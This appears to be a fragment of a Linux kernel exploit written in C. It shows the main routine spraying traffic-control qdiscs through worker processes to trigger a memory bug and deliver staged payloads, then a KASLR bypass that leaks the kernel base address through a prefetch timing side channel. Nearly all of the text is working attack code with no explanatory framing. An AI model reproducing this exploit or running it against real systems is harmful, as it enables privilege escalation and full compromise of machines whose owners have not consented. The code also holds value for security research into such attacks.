  if (argc == 2) {
    u64 base = strtoull(argv[1], NULL, 16);
    L("using supplied kernel base: %llx", base);
    u64 diff = base - 0xffffffff81000000ull;
    L("diff: %llx", diff);

    #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); }
    FOR_ALL_OFFSETS(__x);
    #undef __x
  } else {
    FAIL_IF(get_kernel_base() < 0);
  }


  payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
  FAIL_IF(payload == MAP_FAILED);
  prep_tcf_proto_payload(payload);
  prep_stage1_large_payload(&fake_group);

  for (int try = 0; try < 10; try++) {
    int worker_i = 1;

    L("spraying qdiscs ..");
    for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY; worker_i++) {
      FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0);
      EVENT_WAIT(parent_notify);
    }

    worker_i--;
    qdisc_trigger_bug = 10;

    wake = qdisc_trigger_bug;
    EVENT_WAIT(parent_notify);

    L("triggering payloads ..");
    for (int i = 1; i <= worker_i; i++) {
      if (i != qdisc_trigger_bug) {
        wake = i;
        EVENT_WAIT(parent_notify);
      }
    }

    E("attempt failed .(");
    while (last_worker > 0) {
      kill_worker(last_worker - 1);
    }
    sleep(1);
  }

  E("we failed .(");
  return 0;
}

// KASLR bypass
//
// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
//
inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
  uint64_t a, d;
  asm volatile ("mfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}

inline __attribute__((always_inline)) uint64_t rdtsc_end() {
  uint64_t a, d;
  asm volatile(
    "xor %%rax, %%rax\n\t"
    "lfence\n\t"
    "RDTSCP\n\t"
    "mov %%rdx, %0\n\t"
    "mov %%rax, %1\n\t"
    "mfence\n\t"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}


void prefetch(void* p)
{
  asm volatile ("prefetchnta (%0)" : : "r" (p));
  asm volatile ("prefetcht2 (%0)" : : "r" (p));
}


#define FLUSH_SIZE (4*1024*1024)
u8 __mem[FLUSH_SIZE];

inline void flush_cache() {
  for (int i = 0; i < FLUSH_SIZE; i++) {
    __mem[i] = i;
  }
}

size_t flushandreload(void* addr) // row miss
{
  flush_cache();
  size_t time = rdtsc_begin();
  prefetch(addr);
  size_t delta = rdtsc_end() - time;
  return delta;
}

int get_kernel_base() {
  L("getting kernel base address ..");

  #define START 0xffffffff80000000ull
  #define END 0xfffffffff0000000ull
  #define STEP 0x0000000001000000ull
  size_t times[(END - START) / STEP] = {0};

  for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
    times[ti] = ~0;
  }

  for (int i = 0; i < 16; i++) {
    for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
      u64 addr = START + STEP * (u64)ti;
      size_t t = flushandreload((void*)addr);
      if (t < times[ti]) {
        times[ti] = t;
      }
    }
  }

  size_t minv = ~0;
  size_t mini = -1;
  for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
    if (times[ti] < minv) {
      mini = ti;
      minv = times[ti];
    }
  }

  if (mini < 0) {
    return -1;
  }

  leak_kernel_base = START + STEP * (u64)mini;
  L("likely kernel base: %p (%zu)", (void*)leak_kernel_base, times[mini]);

  i64 diff = 0xffffffff81000000 - leak_kernel_base;
  L("diff: %lld", diff);

  #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); }
  FOR_ALL_OFFSETS(__x);
  #undef __x
  return 0;
}
